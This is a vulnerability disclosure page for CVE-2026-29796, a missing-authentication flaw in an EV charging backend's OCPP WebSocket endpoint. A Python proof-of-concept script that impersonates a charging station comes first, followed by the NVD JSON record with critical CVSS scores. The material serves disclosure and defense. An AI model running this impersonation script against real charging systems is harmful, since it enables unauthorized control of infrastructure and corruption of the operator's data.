CVE-2026-29796

import websocket import json import time # Target configuration TARGET_HOST = "192.168.1.100" TARGET_PORT = 80 CHARGER_ID = "CHARGER_001" URL = f"ws://{TARGET_HOST}:{TARGET_PORT}/{CHARGER_ID}" def on_open(ws): print("[+] WebSocket connection established") # Construct OCPP 1.6 BootNotification request # Format: [MessageTypeId, UniqueId, Action, Payload] # MessageTypeId 2 indicates a request from client to server boot_notification = [ 2, "12345", "BootNotification", { "chargePointVendor": "PoC-Vendor", "chargePointModel": "PoC-Model" } ] print(f"[*] Sending BootNotification: {boot_notification}") ws.send(json.dumps(boot_notification)) def on_message(ws, message): print(f"[<] Received: {message}") # Parse response to confirm impersonation success try: data = json.loads(message) if data[2] == "BootNotification": status = data[3].get('status', 'Unknown') print(f"[+] Charger Status: {status}") except Exception as e: print(f"[-] Error parsing message: {e}") def on_error(ws, error): print(f"[-] Error: {error}") def on_close(ws, close_status_code, close_msg): print("[+] Connection closed") if __name__ == "__main__": print(f"[*] Attempting to connect to: {URL}") ws = websocket.WebSocketApp(URL, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close) ws.run_forever()

{"cve": {"id": "CVE-2026-29796", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:43.410", "lastModified": "2026-05-13T16:33:23.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend."}, {"lang": "es", "value": "Los puntos finales de WebSocket carecen de mecanismos de autenticación adecuados, lo que permite a los atacantes realizar suplantación de estación no autorizada y manipular datos enviados al backend. Un atacante no autenticado puede conectarse al punto final WebSocket de OCPP utilizando un identificador de estación de carga conocido o descubierto, luego emitir o recibir comandos OCPP como un cargador legítimo. Dado que no se requiere autenticación, esto puede llevar a una escalada de privilegios, control no autorizado de la infraestructura de carga y corrupción de los datos de la red de carga reportados al backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:igl:eparking.fi:-:*:*:*:*:*:*:*", "matchCriteriaId": "93828603-B375-4CEE-80BE-49966DC81197"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-08.json", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08", "source": "[email protected]", "tags": ["Not Applicable"]}]}}